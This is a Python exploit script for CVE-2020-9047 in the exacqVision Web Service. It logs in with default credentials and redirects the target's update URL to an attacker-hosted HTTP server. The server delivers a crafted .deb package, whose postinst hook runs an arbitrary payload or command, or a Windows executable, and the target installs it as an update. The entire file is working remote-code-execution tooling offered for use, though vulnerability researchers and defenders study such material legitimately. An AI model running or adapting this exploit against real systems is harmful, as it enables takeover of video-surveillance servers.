# Exploit Title: exacqVision Web Service 3.8.2.67295 - 20.06.3.0 - Remote Code Execution # Date: 2020-07-13 # Exploit Author: Michael W. Norris # Technical Details: https://mnorris.io/research/CVE-2020-9047/ # Vendor Homepage: https://www.exacq.com/ # Software Link: https://www.exacq.com/support/downloads.php # Tested On: exacqVision Web Service 3.8.2.67295 - 20.06.3.0 # CVE: CVE-2020-9047 # Source PoC: https://github.com/norrismw/CVE-2020-9047 #!/usr/bin/python3 import argparse, hashlib, http.server, json, os ,requests, shutil, socketserver, subprocess, sys, tempfile, threading, time description = 'Exploit for exacqVision Web Service as outlined in CVE-2020-9047. This program targets Windows and Linux x86 installations ' description += 'of exacqVision Web Service versions 3.8.2.67295 - 20.06.3.0. Written by Michael W. Norris.' parser = argparse.ArgumentParser(description=description) help_arg = 'The target operating system. Provide "WINDOWS" for Windows, "LINUX" for Linux, or "CHECK" to have this program perform a check. ' help_arg+= 'When using "CHECK", \'\' can be provided for the LHOST and PAYLOAD arguments.' parser.add_argument('TARGET', choices={'WINDOWS', 'LINUX', 'CHECK'}, help=help_arg) parser.add_argument('RHOST', help='The IP address of the remote host; the IP address of the target.') help_arg = 'The port on the remote host where exacqVision Web Service is running. Default: 80' parser.add_argument('-p', metavar='RPORT', type=int, default=80, help=help_arg) help_arg = 'The local IP address that will serve the payload for the remote host. This should not be "localhost" or "127.0.0.1". ' help_arg += 'The remote host will need to be able to connect to the provided IP address. This program should be run on the system with ' help_arg += 'the specified IP address.' parser.add_argument('LHOST', help=help_arg) help_arg = 'The local port that will be used to serve the payload file for the remote host. Default: 8000' parser.add_argument('-s', metavar='LPORT', type=int, default=8000, help=help_arg) help_arg = 'The absolute file path of an existing Windows executable (.exe) or Linux binary file on the local system. The binary will be ' help_arg += 'executed on the remote host. If the --command flag is set and "LINUX" was provided as the TARGET argument, enter a command ' help_arg += 'that will be executed on the remote host.' parser.add_argument('PAYLOAD', help=help_arg) help_arg = 'Sets the command flag. The flag allows for a command to be provided as the PAYLOAD argument instead of a file path to a binary. ' help_arg += ' The provided command will be executed on the remote host. The flag should be set only if "LINUX" was provided as the TARGET ' help_arg += 'argument.' parser.add_argument('--command', default=False, action='store_true', help=help_arg) help_arg = 'The local existing directory where a randomly named temporary directory will be created. Default: /tmp' parser.add_argument('-d', metavar='WEBDIR', default='/tmp', help=help_arg) help_arg = 'The username for authenticating to the remote exacqVision Web Service application. Default: admin' parser.add_argument('-U', metavar='USERNAME', default='admin', help=help_arg) help_arg = 'The password for authenticating to the remote exacqVision Web Service application. Default: admin256' parser.add_argument('-P', metavar='PASSWORD', default='admin256', help=help_arg) args = parser.parse_args() system = args.TARGET rhost = args.RHOST rport = args.p lhost = args.LHOST lport = args.s payload = args.PAYLOAD command_flag = args.command temp_dir = tempfile.mkdtemp(dir = args.d) username = args.U password = args.P class GenPayload: random_infofile = next(tempfile._get_candidate_names()) random_payload = next(tempfile._get_candidate_names()).replace('_', '') server_url = 'http://%s:%s/%s' % (lhost, lport, random_infofile) def __init__(self): if system == 'LINUX': self.package_dir ='/'+self.random_payload self.debian_dir = '/DEBIAN' os.makedirs(temp_dir+self.package_dir+self.debian_dir) if not command_flag: self.ptmp_dir = '/tmp' os.makedirs(temp_dir+self.package_dir+self.ptmp_dir) if system == 'WINDOWS' and command_flag: parser.print_help() sys.exit() def copy_payload(self): if system == 'LINUX' and not command_flag: shutil.copyfile(payload, temp_dir+self.package_dir+self.ptmp_dir+'/'+self.random_payload) else: shutil.copyfile(payload, temp_dir+'/'+self.random_payload+'.exe') def generate_control(self): file_path = temp_dir+self.package_dir+self.debian_dir content = 'Package: {random}\nVersion: 99.99.99.9999\nArchitecture: all\n' content += 'Maintainer: {random}\nDescription: {random}\n' content = content.format(random = self.random_payload) control = open(file_path+'/control','w') control.write(content) control.close() def generate_postinst(self): file_path = temp_dir+self.package_dir+self.debian_dir if command_flag: content = '#!/bin/bash\nservice webservice start\nservice evapache restart\n' content += 'service wfe start\nsystemctl restart webservice\nsystemctl restart wfe\n' content += '%s &' % (payload) else: content = '#!/bin/bash\nservice webservice start\nservice evapache restart\n' content += 'service wfe start\nsystemctl restart webservice\nsystemctl restart wfe\n' content += 'chmod 2755 /tmp/{random} && /tmp/{random} &' content = content.format(random = self.random_payload) postinst = open(file_path+'/postinst','w') postinst.write(content) postinst.close() os.chmod(file_path+'/postinst', 0o0755) def build_package(self): file_path = temp_dir+self.package_dir f_null = open(os.devnull, 'w') try: subprocess.run(['/usr/bin/dpkg-deb', '-Zgzip', '--build', '%s' % file_path], stdout=f_null) except FileNotFoundError: print('Just kidding. It appears that /usr/bin/dpkg-deb is not available on this system') GenPayload.cleanup(temp_dir) sys.exit() shutil.rmtree(temp_dir+self.package_dir) def package_md5sum(self): target_file = open(self, 'rb') content = target_file.read() md5_hash = hashlib.md5() md5_hash.update(content) digest = md5_hash.hexdigest() return digest def generate_fileinfo(self): if system == 'LINUX': sys = 'Linux' ext = 'deb' f = self.random_payload+'.deb' target_file = (temp_dir+'/'+self.random_payload+'.deb') else: sys = 'Windows' ext = 'exe' f = self.random_payload+'.exe' target_file = (temp_dir+'/'+self.random_payload+'.exe') md5sum = GenPayload.package_md5sum(target_file) info_file = (temp_dir+'/'+ self.random_infofile) content = "[ev-WebService-{os}-x64-99.99.99.9999]\nVersion=99.99.99.9999\nDate=12-31-9999\nDownloadable=True\n" content += "Link=http://{lh}:{lp}/{file}\nPackage={os}-x64\nProduct=webservice\n" content += "Filesize={fs}\nChecksumType=md5\nChecksumHash={md5}\nStatus=Recommended\nExtension={ext}\n\n" content += "[ev-WebService-{os}-99.99.99.9999]\nVersion=99.99.99.9999\nDate=12-31-9999\nDownloadable=True\n" content += "Link=http://{lh}:{lp}/{file}\nPackage={os}\nProduct=webservice\n" content += "Filesize={fs}\nChecksumType=md5\nChecksumHash={md5}\nStatus=Recommended\nExtension={ext}\n" content = content.format(os = sys, lh = lhost, lp = lport, file = f, fs = os.path.getsize(target_file), md5 = md5sum, ext = ext) file_info = open(info_file,'w') file_info.write(content) file_info.close() return self.random_infofile def cleanup(self): print('\nRemoving temporary directory structure %s' % temp_dir) shutil.rmtree(temp_dir) print('Stopping HTTP server on 0.0.0.0:%s' % lport) time.sleep(1) class InteractRemote: vuln_versions = ['3.10.4.72058', '3.12.4.76544', '3.8.2.67295', '7.0.2.81005', '7.2.7.86974', '7.4.3.89785', '7.6.4.94391'] vuln_versions += ['7.8.2.97826', '8.0.6.105408', '8.2.2.107285', '8.4.3.111614', '8.6.3.116175', '8.8.1.118913', '9.0.3.124620' ] vuln_versions += ['9.2.0.127940', '9.4.3.137684', '9.6.7.145949', '9.8.4.149166', '19.03.3.152166', '19.06.4.157118'] vuln_versions += ['19.09.4.0', '19.12.2.0', '20.03.2.0', '20.06.3.0'] def __init__(self): self.target = '%s:%s' % (rhost, rport) self.http_target = 'http://'+self.target self.server_url = GenPayload.server_url self.default_url = 'http://www.exacq.com/downloads/evFileInfo.txt' def vuln_check(self): try: version = requests.get(self.http_target+'/version.web').text time.sleep(1) except (ConnectionRefusedError, OSError, TimeoutError): print('Failed to connect to the target: %s' % self.target) print('Is the target correct?') sys.exit() if version in self.vuln_versions[7:]: target_info = requests.get(self.http_target+'/health.web') json_info = json.loads(target_info.text) tar_system = json_info['os']['system'] processor = json_info['os']['processor'] print('Target OS: %s %s' % (tar_system, processor)) print('EVWS Version: %s\n' % version) if tar_system.lower() == 'linux' or tar_system.lower() == 'windows': if system == 'CHECK': print('Exploitable: YES') print('Specify "%s" as the TARGET argument and provide a relevant PAYLOAD argument' % tar_system.upper()) return True try: if system == tar_system.upper(): print('Exploitable: YES') if system == 'LINUX' and not command_flag: print('Confirm the specified PAYLOAD is compatible with the remote architecture') else: print('The provided command will be executed on the remote system') cont_var = input('Press ENTER to continue or CTRL+C to exit\n') if cont_var == '': return True else: sys.exit() else: print('Eploitable: YES') print('... but the provided TARGET argument does not match the remote operating system') print('Specify "%s" as the TARGET argument and provide a relevant PAYLOAD argument' % tar_system.upper()) sys.exit() except KeyboardInterrupt: print('') sys.exit() if version in self.vuln_versions[:7]: print('Target OS: Unable to automatically determine target OS/architecture') print('EVWS Version: %s\n' % version) if system == 'CHECK': print('Exploitable: UNKNOWN') print('Manually determine the operating system/architecture of the remote system') return True try: print('Exploitable: YES') if system == 'LINUX' and command_flag: print('... but only if the provided TARGET argument is accurate\n') print('... but only if the provided TARGET and PAYLOAD arguments are accurate/relevant') cont_var = input('Press ENTER to try or CTRL+C to exit\n') if cont_var == '': return True else: sys.exit() except KeyboardInterrupt: print('') sys.exit() else: print('Exploitable: NO') print('Target %s is not vulnerable and/or this program will not work on the target.' % self.target) sys.exit() def authenticate(self): auth_check = requests.post(self.http_target+'/service.web', data = {'action':'login', 'u':username, 'p':password}) result = json.loads(auth_check.text)['success'] time.sleep(1) if result: auth_token = json.loads(auth_check.text)['auth'] return auth_token else: print('Failed to authenticate due to invalid credentials') sys.exit() def change_url(self, auth_token, default=False): if not default: req_data = {'auth':auth_token, 'url':self.server_url, 'timeout':'10'} change_update = requests.post(self.http_target+'/service.web/updates', data = req_data) else: req_data = {'auth':auth_token, 'url':self.default_url, 'timeout':'10'} change_update = requests.post(self.http_target+'/service.web/updates', data = req_data) result = json.loads(change_update.text)['success'] time.sleep(2) return result def check_updates(self, auth_token): update_check = requests.get(self.http_target+'/service.web?auth=%s&action=updatecheck&updates_file=%s' % (auth_token, self.server_url)) time.sleep(2) def download_update(self, auth_token): req_data = {'auth':auth_token, 'action':'downloadupdate', 'version':'99.99.99.9999'} download = requests.post(self.http_target+'/service.web', data = req_data) status = requests.get(self.http_target+'/service.web?auth=%s&action=downloadupdatestatus&version=99.99.99.9999' % (auth_token)) time.sleep(2) status = requests.get(self.http_target+'/service.web?auth=%s&action=downloadupdatestatus&version=99.99.99.9999' % (auth_token)) while json.loads(status.text)['current_file_size'] != json.loads(status.text)['total_file_size']: print('\nWaiting for download to complete.') time.sleep(1) status = requests.get(self.http_target+'/service.web?auth=%s&action=downloadupdatestatus&version=99.99.99.9999' % (auth_token)) req_data = {'auth':auth_token, 'action':'update', 'version':'99.99.99.9999'} update = requests.post(self.http_target+'/service.web', data = req_data) result = json.loads(update.text)['success'] if result: return True else: print('\nThe target was unable to download the payload from %s' % self.server_url) GenPayload.cleanup(temp_dir) sys.exit() def temporary_server(self): print('Starting HTTP server on 0.0.0.0:%s' % lport) print('Serving payload from %s directory\n' % temp_dir) handler = http.server.SimpleHTTPRequestHandler os.chdir(temp_dir) httpd = socketserver.TCPServer(('', lport), handler) httpd.serve_forever() def server_thread(self): server_thread = threading.Thread(target=self.temporary_server) server_thread.daemon = True server_thread.start() time.sleep(1) if __name__ == '__main__': w = InteractRemote() x = GenPayload() if system == 'CHECK': w.vuln_check() sys.exit() else: y = w.vuln_check() z = w.authenticate() if system == 'LINUX': x.generate_control() if not command_flag: x.copy_payload() x.generate_postinst() x.build_package() else: x.copy_payload() x.generate_fileinfo() w.server_thread() if y in InteractRemote.vuln_versions[7:]: w.change_url(z) w.check_updates(z) w.change_url(z, default=True) w.download_update(z) else: w.check_updates(z) w.download_update(z) x.cleanup() sys.exit()